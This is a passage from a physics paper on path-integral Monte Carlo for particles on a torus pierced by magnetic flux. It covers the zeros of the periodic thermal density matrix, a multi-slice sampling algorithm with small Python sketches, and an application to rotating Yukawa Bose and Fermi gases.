(We will analyze the zeros of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ below.)
Beyond a certain value of $\beta$ the picture is essentially stationary.
We note that $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$ is \textit{not} invariant under a simultaneous displacement
of both $\mathbf r$ and $\mathbf r'$ by the same vector $\mathbf d$, except for special choices of $\mathbf d$;
such a displacement corresponds to choosing a shifted magnetic unit cell on the plane
for compactification by periodic boundary conditions.
This is understood easily by noting that the second characteristic $b_m$ appears in Eq.~(\ref{eq:theta})
as a simple additive constant to the variable $z$, letting us rewrite Eq.~(\ref{eq:second}) as
\begin{widetext}
\begin{multline}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) =
\frac{1}{N_\phi}\rho^\text{open}(\mathbf r,\mathbf r';\beta)\\
\times\sum_{m=0}^{N_\phi-1}
\left\{
\vartheta\begin{bmatrix} 0 \\ a_m + \frac{L_1}{4\pi\ell^2N_\phi}(y+y') \end{bmatrix}
\left(\frac{\pi N_\phi\tau_1'}{L_1}(x'-x)\Big|\tau_1'\right)
\vartheta\begin{bmatrix} 0 \\ 2b_m'+\frac{N_\phi}{L_1}(x+x') \end{bmatrix}
\left(\frac{\pi(y-y')\tau_2}{2L_2\sin\theta}\Big|\tau_2\right)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} + \frac{L_1}{4\pi\ell^2N_\phi}(y+y') \end{bmatrix}
\left(\frac{\pi N_\phi\tau_1'}{L_1}(x'-x)\Big|\tau_1'\right)
\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m'+\frac{N_\phi}{L_1}(x+x') \end{bmatrix}
\left(\frac{\pi(y-y')\tau_2}{2L_2\sin\theta}\Big|\tau_2\right)
\right\}.
\end{multline}
\end{widetext}
Then it is clear that the arguments of the theta functions depend on the coordinate differences only,
and the displacement of the center of mass can be incorporated in the characteristics as
\begin{equation}
b_m\to b_m+\frac{N_\phi}{L_1}d_x,\quad
a_m\to a_m+\frac{L_1}{2\pi\ell^2N_\phi}d_y.
\end{equation}
These in turn correspond to fluxes \cite{Aharonov59,Byers61},
and the shift of the center of mass corresponds to a change in the
twist angles according to Eq.~(\ref{eq:abdef}):
\begin{equation}
\phi_2\to\phi_2-\frac{2\pi N_\phi}{L_1}d_x,\quad
\phi_1\to\phi_1+\frac{L_1}{\ell^2}d_y.
\end{equation}
Thus the twisted boundary conditions in Eq.~(\ref{eq:twisted}), and, consequently, $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$,
are invariant only if
\begin{equation}
\label{invariant}
\mathbf d = \left(\frac{L_1}{N_\phi}n_1,\frac{2\pi\ell^2}{L_1}n_2\right)
\end{equation}
for integral $n_1$ and $n_2$.
In the $\beta\to0$ limit the density matrix must satisfy
$\rho(\mathbf r,\mathbf r';\beta)\to\delta(\mathbf r-\mathbf r')$, and this holds for
the density matrix appropriate for open boundary conditions in Eq.~(\ref{eq:openbc}).
Using Eq.~(\ref{eq:second}) and the identities of the traditionally defined Jacobi elliptic functions \cite{comment1}
\[
\vartheta_{3,2}(z|\tau)=\sqrt\frac{i}{\tau}\sum_{n=-\infty}^{\infty}(\pm1)^n\exp\left(-\frac{i\pi}{\tau}\left(n+\frac{z}{\pi}\right)^2\right)
\]
one can check that
\begin{multline}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta\to0) =\sum_{k_1,k_2}
e^{ik_1\phi_1+ik_2\phi_2-\frac{ixk_2L_2\sin\theta}{\ell^2}}\\
\times\delta\left(x-x'-k_1L_1-k_2L_2\cos\theta\right)\\
\times\delta\left(y-y'-k_2L_2\sin\theta\right),
\end{multline}
which complies with the discrete magnetic translation symmetries
\begin{equation}
\begin{split}
t_{\mathbf r}(n\mathbf L_1+m\mathbf L_2)
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) &= e^{i(n\phi_1+m\phi_2)}\rho^\text{PBC}(\mathbf r,\mathbf r';\beta),\\
t^\ast_{\mathbf r'}(n\mathbf L_1+m\mathbf L_2)
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)&=e^{-i(n\phi_1+m\phi_2)}\rho^\text{PBC}(\mathbf r,\mathbf r';\beta),
\end{split}
\label{eq:peri}
\end{equation}
which hold for any $\beta$.
In the low-temperature limit, $\beta\to\infty$ ($u\to0$),
the analytic structure of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ simplifies significantly.
Notice that both for open and periodic boundary conditions the value of the density matrix goes to
zero at any fixed coordinates $\mathbf r$ and $\mathbf r'$.
This is an artifact of the zero-point energy $\frac{\hbar\omega_c}{2}$, and does not appear in averages
as they involve normalization by the partition function $Z(\beta)=\sum_{n=0}^\infty u^{n+1/2}=\frac{\sqrt u}{1-u}$.
We study the analytic structure in the low-temperature limit by factoring out the nonzero factor
$\rho^\text{open}(\mathbf r,\mathbf r';\beta)$ for convenience:
\begin{equation}
\lim_{\beta\to\infty}
\frac{\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)}{\rho^\text{open}(\mathbf r,\mathbf r';\beta)} = f_\infty(z,z'),
\end{equation}
where
\begin{multline}
f_\infty(z,z')=\frac{1}{N_\phi}
\sum_{m=0}^{N_\phi-1}\left\{
\vartheta\begin{bmatrix} 0 \\ a_m \end{bmatrix}\left(\frac{iL_1}{4\ell^2 N_\phi}\left({z'}^\ast-z\right)
\Big|\tilde\tau_1\right)\right.\\
\left.\times
\vartheta\begin{bmatrix} 0 \\ 2b_m' \end{bmatrix}\left(
\frac{N_\phi\pi}{L_1}\left(z+{z'}^\ast\right)
|\tilde\tau_2\right)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} \end{bmatrix}
\left(\frac{iL_1}{4\ell^2 N_\phi}\left({z'}^\ast-z\right)
\Big|\tilde\tau_1\right)\right.\\
\left.\times\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m' \end{bmatrix}
\left(\frac{N_\phi\pi}{L_1}\left(z+{z'}^\ast\right)
|\tilde\tau_2\right)
\right\},
\end{multline}
where
$\tilde\tau_1=\frac{i}{\pi}\left(\frac{L_1}{2\ell N_\phi}\right)^2$
and
$\tilde\tau_2=i\pi\left(\frac{2\ell N_\phi}{L_1}\right)^2$.
$f_\infty(z,z')$ is holomorphic in $z$, and antiholomorphic in $z'$, on the entire complex plane.
Fixing $z'$, the zeros of $f_\infty(z,z')$ can be counted by the argument principle of complex calculus.
Consider the quadruple domain $Q$ with corners $z'+L_1(\pm1\pm\tau)$, cf.\ Fig.~\ref{fig:domain}(b).
We have
\begin{equation}
\oint_{\partial Q} \frac{d}{dz}\ln\left(f_\infty(z,z')\right) dz=-8\pi iN_\phi,
\end{equation}
which, exploiting the periodicities in Eq.~(\ref{eq:peri}) and the fact that
$\rho^\text{open}(\mathbf r,\mathbf r';\beta)$ is nonzero,
implies that the thermal propagator $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta\to\infty)$
has $N_\phi$ zeros in the principal domain in Fig.~\ref{fig:domain}(a).
At nonzero temperature the analytic structure of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ is not simple.
Nevertheless, we have found numerically that the number of zeros in the principal domain is the same
at any finite $\beta$, and the zeros very quickly reach their final location.
See Fig.~\ref{zeros} for illustration.
If $N_\phi$ is odd, there are zeros that do not move at all.
For $\phi_1=\phi_2=0$, in particular, one of them is located in the corners of the principal domain
(which are identical by periodicity).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth]{zeros65crop}
\includegraphics[width=\columnwidth]{zeros50crop}
\end{center}
\caption{\label{zeros}
The low-temperature limit $\beta\to\infty$ of the thermal density matrix.
As no change is discernible beyond $\beta=100$, the density plot has been generated using this value.
(a) $N_\phi=4$ particles, $\theta\approx65^\circ$, $|\mathbf L_2|/|\mathbf L_1|=1.2$, $\phi_1=\phi_2=0$.
In the zoomed area we show how the zeros move to their asymptotic position as a function of
inverse temperature $\beta$.
(b) The same for $N_\phi=5$, $\theta\approx50^\circ$, $|\mathbf L_2|/|\mathbf L_1|=1.25$, $\phi_1=\phi_2=0$.
Note that one of the zeros is fixed at the corner of the principal region,
which is the generic behavior when $N_\phi$ is odd.
}
\end{figure}
Fig.~\ref{zerostruct} shows the structure of zeros for different geometries.
Multiple zeros occur in regular cases, as for the square unit cell in panel (b).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=0.49\columnwidth]{zerostruc1}
\includegraphics[width=0.49\columnwidth]{zerostruc2}
\includegraphics[width=0.49\columnwidth]{zerostruc3}
\includegraphics[width=0.49\columnwidth]{zerostruc4}
\end{center}
\caption{\label{zerostruct}
The structure of zeros of the thermal density matrix for $\beta\hbar\omega_c=200$,
where the picture is stationary for different geometries and flux quanta.
We show $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$, the zeros are the darkest spots.
We set $\phi_1=\phi_2=0$ and fix $\mathbf r'$ at the origin.
(a) Generic torus with $N_\phi=6$, $L_2/L_1=1.13$ and $\theta\approx75^\circ$;
(b) Square principal domain ($\theta=90^\circ$, $L_2/L_1=1$) with $N_\phi=7$;
(c) Generic torus with $N_\phi=11$, $L_2/L_1=1.19$ and $\theta\approx72^\circ$;
(d) Hexagonal principal domain ($\theta=60^\circ$, $L_2/L_1=1$) with $N_\phi=12$.
}
\end{figure}
In Fig.~\ref{zeromove} we show the motion of the zeros of the thermal density matrix as we tune the twist angles.
Qualitatively, the motion of the zeros shows an interesting analogy with the Hall current:
tuning $\phi_1$ moves them in the $\mathbf L_2$ direction (the direction of the electromotive force
on a charged particle induced by the change of flux), and vice versa.
As a deeper explanation of the motion of the zeros is not crucial to the present work, we leave
the analysis of this issue as an open problem.
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.48\textwidth]{zeromove_x}
\includegraphics[width=0.48\textwidth]{zeromove_y}
\end{center}
\caption{\label{zeromove}(Color online)
The trajectories of the zeros of the thermal density matrix as we tune
(a) the twist angle $\phi_1$ and (b) the twist angle $\phi_2$ between 0 and $2\pi$.
We set $\beta\hbar\omega_c=200$, $\mathbf r'=0$, $N_\phi=2$, $L_2/L_1=1.19$ and $\theta\approx56^\circ$.
The crosses at specific points on the trajectories correspond to multiples of $\pi/5$.
The speed of the zeros is not uniform, as visible from the distance between adjacent labelled points.
}
\end{figure*}
\section{Multi-slice sampling}
\label{multislice}
For noninteracting particles and open boundary conditions, the familiar construction of multi-slice
moves \cite{Pollock84} by the bisection method \cite{Ceperley95}
builds a Brownian bridge $R_{L+1},R_{L+2},\dots,R_{R-1}$ between the fixed configurations $R_L$ and $R_R$
at possibly distant slices $L$ and $R=L+2^l$ (mod $M$) on the path.
The deviation of the high-temperature density matrix used in the simulation from the ideal gas case
can be taken into account either at each level or only at the last level of this recursive procedure.
At each level of this recursive construction we need to know the PDF
of configuration $R_i$, which is to be inserted between $R_{i-s}$ and $R_{i+s}$
at time distances $\pm s\tau$ on the path.
If the ideal gas density matrix $\rho_0(R,R';\beta)$ is \emph{real}, this is simply
\begin{equation}
p(R_i)=\frac{\rho_0(R_{i-s},R_i;s\tau)\rho_0(R_i,R_{i+s};s\tau)}{\rho_0(R_{i-s},R_{i+s};2s\tau)};
\end{equation}
the convolution property in Eq.~(\ref{eq:conv}) ensures that this is a normalized PDF.
If we can sample $p(R_i)$ directly, we implement the \emph{heat-bath rule} for noninteracting particles.
(In fact, with open boundary conditions and zero external magnetic field, $p(R_i)$ is a Gaussian.)
On the other hand, if the free density matrix $\rho_0(R,R',\tau)$ is \emph{complex},
paths must be sampled from the PDF $\prod_{m=1}^{M}|\rho(R_{m-1},R_m;\tau)|$.
As $|\rho_0(R,R',\tau)|$ does not satisfy a convolution property analogous to Eq.~(\ref{eq:conv}),
\begin{equation}
\widetilde p(R_i)=
\frac{|\rho_0(R_{i-s},R_i;s\tau)||\rho_0(R_i,R_{i+s};s\tau)|}{|\rho_0(R_{i-s},R_{i+s};2s\tau)|}
\end{equation}
is not a normalized PDF.
This is not a problem for single-slice moves, but it plagues the bisection method.
First consider how one could adapt multi-slice moves to periodic boundary conditions in the \textit{absence} of a
magnetic field in one dimension.
The single-particle density matrix is \cite{Ceperley95}
\begin{multline}
\rho^\text{PBC}_0(x,x';\beta)=\frac{1}{L}\vartheta_3\left(
\frac{\pi}{L}(x-x') \Big| \frac{4\pi i\lambda\beta}{L^2}\right)=\\
=\frac{1}{\sqrt{4\pi\lambda\beta}}\sum_{n=-\infty}^\infty
\exp\left(-\frac{(x-x'+nL)^2}{4\lambda\beta}\right),
\end{multline}
where $L$ is the period.
(The second equality involves a modular transformation of the function $\vartheta_3(z|\tau)$.)
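As a quick numerical consistency check (our addition, not part of the derivation), the image-sum and theta-series forms of $\rho^\text{PBC}_0$ can be compared directly. In the Python sketch below, `lam` stands for $\lambda$ and both sums are truncated at `nmax` terms:

```python
import math

def rho_images(x, xp, lam, beta, L, nmax=50):
    # Image-sum form: periodic copies of the free Gaussian propagator.
    pref = 1.0 / math.sqrt(4.0 * math.pi * lam * beta)
    return pref * sum(math.exp(-(x - xp + n * L) ** 2 / (4.0 * lam * beta))
                      for n in range(-nmax, nmax + 1))

def rho_theta(x, xp, lam, beta, L, nmax=50):
    # Theta-series form: (1/L) vartheta_3(pi(x-xp)/L | 4 pi i lam beta / L^2),
    # with the n and -n terms of the series combined into cosines.
    s = 1.0
    for n in range(1, nmax + 1):
        s += 2.0 * math.exp(-4.0 * math.pi ** 2 * lam * beta * n ** 2 / L ** 2) \
                 * math.cos(2.0 * math.pi * n * (x - xp) / L)
    return s / L
```

Both truncated sums agree to machine precision for moderate $\lambda\beta/L^2$, confirming the modular identity numerically.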
Optimal sampling could be achieved by the heat-bath rule on slice $m$
\begin{equation*}
T^\ast(x'_m|x_{m-1},x_{m+1})=\frac{\rho^\text{PBC}_0(x_{m-1},x_m;\tau)\rho^\text{PBC}_0(x_m,x_{m+1};\tau)}{\rho^\text{PBC}_0(x_{m-1},x_{m+1};2\tau)}.
\end{equation*}
Sampling $x'_m$ from this PDF results in moves that are always accepted for noninteracting particles.
With straightforward algebra,
\begin{multline}
\label{eq:hbath}
T^\ast(x'_m|x_{m-1},x_{m+1})=\\
=\alpha_0\sum_{k=-\infty}^\infty\exp\left(-
\frac{((x_{m+1}+x_{m-1})/2-x'_m+kL)^2}{2\lambda\tau}\right)+\\
+\alpha_1\sum_{k=-\infty}^\infty\exp\left(-
\frac{((x_{m+1}+x_{m-1}+L)/2-x'_m+kL)^2}{2\lambda\tau}\right),
\end{multline}
where
\begin{multline*}
\alpha_i = \frac{1}{\sqrt{2\pi\lambda\tau}}\frac{
\sum_{k'}\exp\left(-\frac{((x_{m+1}-x_{m-1}+iL)/2+k'L)^2}{2\lambda\tau}\right)}
{\sum_{k'}\exp\left(-\frac{(x_{m+1}-x_{m-1}+k'L)^2}{8\lambda\tau}\right)}.
\end{multline*}
$T^\ast(x'_m|x_{m-1},x_{m+1})$ has a very simple structure: the first term
is a collection of the periodic copies of the Gaussian peak centered at $(x_{m+1}+x_{m-1})/2$,
the second term collects peaks at periodic copies of $(x_{m+1}+x_{m-1}+L)/2$.
This suggests a very simple algorithm: with probability
$p=\alpha_0/(\alpha_0+\alpha_1)$ we sample a Gaussian of variance $\lambda\tau$ at
$(x_{m+1}+x_{m-1})/2$, with probability $1-p$ we sample a similar Gaussian at $(x_{m+1}+x_{m-1}+L)/2$.
(With no loss of generality we can choose any of the equivalent peaks,
and map $x'_m$ back to the interval $(-L/2,L/2)$.)
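The sampler described above amounts to only a few lines of code. The Python sketch below is a minimal version (the function name and the truncation `kmax` of the image sums are ours); only the numerators of $\alpha_0$ and $\alpha_1$ in Eq.~(\ref{eq:hbath}) are evaluated, because their common denominator cancels in $p$:

```python
import math, random

def heat_bath_1d(xm1, xp1, lam, tau, L, kmax=5):
    # Only the numerators of alpha_0 and alpha_1 are needed, since their
    # common denominator cancels in p = alpha_0 / (alpha_0 + alpha_1).
    delta = xp1 - xm1
    def num(i):
        return sum(math.exp(-((delta + i * L) / 2.0 + k * L) ** 2
                            / (2.0 * lam * tau))
                   for k in range(-kmax, kmax + 1))
    n0, n1 = num(0), num(1)
    center = (xm1 + xp1) / 2.0          # peak of the first Gaussian comb
    if random.random() >= n0 / (n0 + n1):
        center += L / 2.0               # shift to the second comb
    x = random.gauss(center, math.sqrt(lam * tau))
    return (x + L / 2.0) % L - L / 2.0  # map back to the interval [-L/2, L/2)
```

Truncating at `kmax=5` images is ample whenever $\lambda\tau\ll L^2$, since the Gaussian weights decay rapidly.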
Further, $T^\ast$ in Eq.~(\ref{eq:hbath}) can be applied on any level of the bisection
method to construct a free-particle trajectory between two slices separated by imaginary time $2^l\tau$.
With interactions present, the deviation of the high-temperature density matrix that defines the PDF of paths
from $\rho^\text{PBC}_0$ could be taken into account by a rejection step on the last level of recursion.
(For alternative approaches to periodicity in zero magnetic field, see Ref.~\onlinecite{Cao94}.)
In the presence of an external magnetic field, the density matrix in Eq.~(\ref{eq:second}) is complex-valued.
We sample paths by the product of the magnitudes of the density matrices that connect
subsequent slices.
Consider moving a bead $z_m$ on slice $m$ with all other beads fixed.
\begin{equation*}
T^\ast(z'_m|z_{m-1},z_{m+1})=\frac{|\rho^\text{PBC}(z_{m-1},z_m;\tau)||\rho^\text{PBC}(z_m,z_{m+1};\tau)|}{|\rho^\text{PBC}(z_{m-1},z_{m+1};2\tau)|}
\end{equation*}
is not a normalized PDF, but this would not impair the Metropolis algorithm.
As in the $\beta\to0$ limit $|\rho^\text{PBC}(z,z';\tau)|$ with fixed $z'$ tends to a system of Gaussian peaks
centered at $z'+n_1L_1+n_2L_1\tau$ with integer $n_1,n_2$, just like in the nonmagnetic case, we try the following.
We choose the \textit{a priori} sampling PDF $T(z'_m|z_{m-1},z_{m+1})$ as a collection of four Gaussian
peaks centered at
\begin{equation}
\begin{split}
Z^{z_{m-1},z_{m+1}}_0&=(z_{m-1}+z_{m+1})/2,\\
Z^{z_{m-1},z_{m+1}}_1&=(z_{m-1}+z_{m+1}+L_1)/2,\\
Z^{z_{m-1},z_{m+1}}_2&=(z_{m-1}+z_{m+1}+L_1\tau)/2,\\
Z^{z_{m-1},z_{m+1}}_3&=(z_{m-1}+z_{m+1}+L_1(1+\tau))/2.
\end{split}
\end{equation}
The height of these peaks is proportional to
\begin{equation}
\alpha_i=\frac{|\rho^\text{PBC}(z_{m-1},Z_i;\tau)||\rho^\text{PBC}(Z_i,z_{m+1};\tau)|}
{|\rho^\text{PBC}(z_{m-1},z_{m+1};2\tau)|},
\end{equation}
for $0\le i\le 3$.
We choose peak $i$ with probability $p_i=\alpha_i/(\sum_{j=0}^3\alpha_j)$.
We take into account the fact that the diffusive motion described by both
$|\rho^\text{open}(R,R',\tau)|$ and $|\rho^\text{PBC}(R,R',\tau)|$ is different
from the diffusion in the absence of a magnetic field.
Thus the sampled Gaussian has variance $\frac{1-u}{1+u}\ell^2$ with $u=e^{-\hbar\omega_c\tau}$.
Notice that $\frac{1-u}{1+u}\ell^2<\lambda\tau$.
As the heat-bath rule is not obeyed, the acceptance probability is less than unity even
for noninteracting particles in single-slice moves:
\begin{multline}
A(z_m\to z'_m) =
\frac{|\rho^\text{PBC}(z_{m-1},z'_m;\tau)||\rho^\text{PBC}(z'_m,z_{m+1};\tau)|}{
|\rho^\text{PBC}(z_{m-1},z_m;\tau)||\rho^\text{PBC}(z_m,z_{m+1};\tau)|}\\
\times\frac{T(z_m|z_{m-1},z_{m+1})}{T(z'_m|z_{m-1},z_{m+1})}.
\end{multline}
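A single-slice move of this kind can be sketched as follows (Python; `abs_rho` is a caller-supplied function returning $|\rho^\text{PBC}(z,z';\Delta\tau)|$, whose closed form is not reproduced here, and periodic images of the proposal peaks are neglected for brevity — a sketch, not a full implementation):

```python
import math, random

def gauss2(dz, var):
    # Isotropic two-dimensional Gaussian density in the complex plane.
    return math.exp(-abs(dz) ** 2 / (2.0 * var)) / (2.0 * math.pi * var)

def single_slice_move(zm1, z, zp1, abs_rho, dt, L1, tau_mod, ell, u):
    """One Metropolis update of bead z between fixed neighbours zm1 and zp1.

    tau_mod is the complex modular parameter of the torus; the proposal mixes
    four Gaussian peaks at the half-period-shifted midpoints, each with
    per-component variance (1-u)/(1+u)*ell**2, u = exp(-hbar*omega_c*dt).
    """
    var = (1.0 - u) / (1.0 + u) * ell ** 2
    shifts = (0.0, L1, L1 * tau_mod, L1 * (1.0 + tau_mod))
    centers = [(zm1 + zp1 + s) / 2.0 for s in shifts]
    w = [abs_rho(zm1, c, dt) * abs_rho(c, zp1, dt) for c in centers]
    tot = sum(w)
    r, cum = random.random() * tot, 0.0
    for i, wi in enumerate(w):          # pick peak i with probability w_i/tot
        cum += wi
        if r <= cum:
            break
    sig = math.sqrt(var)
    z_new = centers[i] + complex(random.gauss(0.0, sig), random.gauss(0.0, sig))
    T = lambda zz: sum(wi * gauss2(zz - c, var) for wi, c in zip(w, centers))
    A = (abs_rho(zm1, z_new, dt) * abs_rho(z_new, zp1, dt) * T(z)) \
        / (abs_rho(zm1, z, dt) * abs_rho(z, zp1, dt) * T(z_new))
    if random.random() < min(1.0, A):
        return z_new, True
    return z, False
```

The four weights implement the $\alpha_i$ defined above up to their common denominator, which cancels in the peak-selection probabilities and in the acceptance ratio.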
For multi-slice moves, we proceed as follows.
(i) A trial path is constructed recursively between slices $L$ and $R=L+2^l$.
Midway between slices $L$ and $R$, we choose $z'_{(L+R)/2}$
from one of four Gaussian peaks at $Z^{z_{L},z_{R}}_i$ of
variance $\frac{1-u_1}{1+u_1}\ell^2$, where $u_1=e^{-\hbar\omega_c\tau_1}$ and $\tau_1=2^{l-1}\tau$.
Then we sample $z'_{L+2^{l-2}}$ from one of four Gaussian peaks at $Z^{z_{L},z'_{(L+R)/2}}_i$
and $z'_{R-2^{l-2}}$ from one of four Gaussian peaks at $Z^{z'_{(L+R)/2},z_R}_i$,
all having variance $\frac{1-u_2}{1+u_2}\ell^2$, where $u_2=e^{-\hbar\omega_c\tau_2}$ and $\tau_2=2^{l-2}\tau$.
We continue on subsequent levels, until the trial path $z'_{L+1},\dots z'_{R-1}$ is complete.
During this construction, the ratio of the \textit{a priori} sampling PDFs
\begin{equation}
P_1=\frac{T(z_{L+1},\dots z_{R-1}|z_{L},z_{R})}{T(z'_{L+1},\dots z'_{R-1}|z_{L},z_{R})}
\end{equation}
is stored.
(ii) Once the trial path is available, the ratio of the PDFs of the new and the old paths is calculated:
\begin{equation}
P_2=\frac{\prod_{m=L+1}^{R}|\rho(z'_{m-1},z'_m;\tau)|}{
\prod_{m=L+1}^{R}|\rho(z_{m-1},z_m;\tau)|}.
\end{equation}
The constructed trial path is then accepted with probability $A(z\to z')=P_1P_2$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth]{stest}
\end{center}
\caption{\label{fig:stest}
Acceptance ratios for sampling the motion of a single particle on a rectangular
torus pierced by $N_\phi=2$ flux quanta.
The inverse temperature of the system is $\beta\hbar\omega_c=2$,
and the number of slices ranged between $M=8$ and 256.
Level $l$ means that $2^l-1$ slices are updated in each multi-slice move.
}
\end{figure}
For testing the efficiency of the above algorithm, in Fig.~\ref{fig:stest} we show
the acceptance ratio for the simplest possible case, the simulation of a single free particle on the torus.
The phase was fixed to the density matrix in Eq.~(\ref{eq:second});
we set $\beta\hbar\omega_c=2$, and there are $N_\phi=2$ flux quanta through a rectangular torus.
(For the computational advantage of choosing $N_\phi$ even, see Appendix \ref{app:comput}.)
For $N$ particles, the acceptance ratio is roughly the single-particle value raised to the $N$-th power;
this is the baseline that interactions are expected to reduce further.
We have checked systematically that the acceptance ratio depends only weakly on the aspect ratio
or the twist angles.
\section{Application: rotating Yukawa gases}
\label{yukawa}
We consider particles that interact by a repulsive modified-Bessel-function interaction.
The system rotates about the $z$-axis with angular velocity $\Omega$.
In the co-rotating frame it is described by the Hamiltonian
\begin{equation}
\label{eq:corot}
\mathcal H=-\frac{\hbar^2}{2m}\sum_{i=1}^N
\left(\nabla_i - \frac{im}{\hbar}\mathbf\Omega\times\mathbf r\right)^2
+\epsilon\sum_{i<j}K_0\left(\frac{r_{ij}}{a}\right),
\end{equation}
where $\epsilon$ and $a$ characterize the strength and the range of the interaction, respectively.
We consider both Bose and spinless Fermi systems.
In cold atomic experiments a confinement potential is also present, which is weakened by the centrifugal
force in the co-rotating frame.
We do not include these terms; we describe a homogeneous portion of the gas.
As apparent from Eq.~(\ref{eq:corot}), the Coriolis force couples to momenta just like
a uniform magnetic field does for charged particles \cite{Wilkin98,Cooper08}.
The quantitative connection is established by the correspondence
\begin{equation}
\omega_c=2\Omega,\qquad\ell=\sqrt{\frac{\hbar}{2m\Omega}}.
\end{equation}
For $\Omega=0$, a mathematically equivalent system arises in type-II superconductors,
where the bosons correspond to Abrikosov vortex lines \cite{Nelson89}.
Both the ground state \cite{Magro93} and the finite temperature \cite{Nordborg97} phase diagram
of this time-reversal invariant system have been explored by quantum Monte Carlo techniques.
There are four energy scales in the problem: the temperature $k_\text{B}T\equiv\beta^{-1}$,
the cyclotron energy $\hbar\omega_c$, the interaction strength $\epsilon$, and
the energy that corresponds to the interaction length scale, $\hbar^2/(2ma^2)$.
We introduce the dimensionless parameters
\begin{equation}
\begin{split}
\beta^\ast = \beta\hbar\omega_c=2\beta\hbar\Omega,\quad\quad
\rho^\ast=\rho a^2,\\
\Lambda=\sqrt{\frac{\hbar^2}{2ma^2\epsilon}},\quad\quad
\kappa=\frac{a}{\ell}=a\sqrt{\frac{2m\Omega}{\hbar}},
\end{split}
\end{equation}
where $\rho$ is the particle density and $\ell$ is the magnetic length.
$\Lambda$ is the de Boer interaction strength parameter.
We could also have used
\begin{equation}
\tilde\beta=\beta\epsilon
\end{equation}
to turn the inverse temperature dimensionless;
the two dimensionless temperature parameters are related as $\tilde\beta=\beta^\ast/(2\kappa^2\Lambda)$.
The dimensionless density can be related to the filling factor $\nu$ of Landau levels as $\rho^\ast=\kappa^2\nu/2\pi$.
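As a cross-check of these relations (a convenience helper of our own, not part of the method), the conversions can be collected in a few lines of Python and compared against the values quoted in the figure captions:

```python
import math

def dimensionless(beta_star, rho_star, Lambda, nu):
    """kappa and beta_tilde from beta*, rho*, Lambda and the filling factor nu.

    Uses rho* = kappa**2 * nu / (2*pi)  ->  kappa = sqrt(2*pi*rho*/nu)
    and  beta_tilde = beta* / (2 * kappa**2 * Lambda).
    """
    kappa = math.sqrt(2.0 * math.pi * rho_star / nu)
    beta_tilde = beta_star / (2.0 * kappa ** 2 * Lambda)
    return kappa, beta_tilde
```

With $\rho a^2=0.02$, $\nu=2$, $\beta^\ast=0.5$ and $\Lambda=0.035$ this reproduces $\kappa\approx0.25066$ and $\tilde\beta\approx114$, as quoted in Fig.~\ref{fig:bose}.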
With time-reversal symmetry, the system orders in a triangular lattice for strong interaction (small $\Lambda$)
\cite{Magro93,Nordborg97}.
With this prior knowledge, we choose the aspect ratio of the rectangular simulation cell so that it can
accommodate a finite piece of a triangular lattice with periodic boundary conditions.
This means $\sqrt3/2$ for $N=4$, 12 and 16 particles, and $\sqrt3$ for $N=8$ particles.
We emphasize that this choice is the only \textit{a priori} input to our simulation.
The ideal Bose and Fermi gas, respectively, that we use for phase fixing is tailored
neither to a crystal nor to a correlated liquid.
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosea.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{boseb.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosec.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosed.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosee.eps}
\end{center}
\caption{(Color online)\label{fig:bose}
(a-c) The pair-correlation function for $N=12$ bosons at density $\rho a^2=0.02$ ($\kappa=0.25066$),
at filling factor $\nu=2$ (i.e., $N_\phi=6$ flux quanta piercing the torus) and interaction strength $\Lambda=0.035$,
0.04, and 0.045, respectively.
$M=32$ slices were used, the imaginary time-step is $\tau=0.015625$.
The temperature is low on the scale of interactions, as $\tilde\beta=114$, 99, and 88 in panels (a) to (c).
Panels (d) and (e) show the difference of the pair-correlation functions as $\Lambda$ is changed
from 0.035 to 0.04, and from 0.04 to 0.045, respectively, for systems shown in the top row.
The triangular lattice of dark spots testifies to the decreasing crystalline correlations as $\Lambda$ is increased.
The small deviations from perfect $C_6$ symmetry in panels (b) and (c)
can be attributed to imperfect thermalization, and could be reduced by longer Monte Carlo runs.
Taking the differences between pair-correlation functions in panels (d) and (e) amplifies these small errors.
}
\end{figure*}
In analogy to free-particle nodes, we fix the phase to the density matrix of the ideal gas,
\begin{equation}
\label{eq:freefermi}
\rho_F(R,R';\beta) = \text{Det}(\rho^\text{PBC}(\mathbf r_i,\mathbf r'_j;\beta))
\end{equation}
for fermions, and
\begin{equation}
\label{eq:freebose}
\rho_B(R,R';\beta) = \text{Perm}(\rho^\text{PBC}(\mathbf r_i,\mathbf r'_j;\beta))
\end{equation}
for bosons; Perm stands for the permanent.
As we will see, such an Ansatz is sufficiently nonrestrictive for reasonable predictions \cite{comment2}.
(Computationally, of course, the Fermi case is easier.)
As phase-fixing for PIMC has already been discussed in the literature \cite{Akkineni08},
we are content with summarizing the technicalities in Appendix \ref{app:pfaction}.
The pair-correlation function for $N=12$ bosons at $\beta^\ast=0.5$ is shown in Fig.~\ref{fig:bose}.
Qualitatively, the transition to the crystalline structure is captured.
Due to computational limitations, however, we cannot simulate more than twelve bosons.
The pair-correlation for a larger Fermi system is shown in Fig.~\ref{fig:fermi}.
The qualitative behavior is similar.
Notice that although the small $\beta^\ast$ means that temperature destroys magnetic effects,
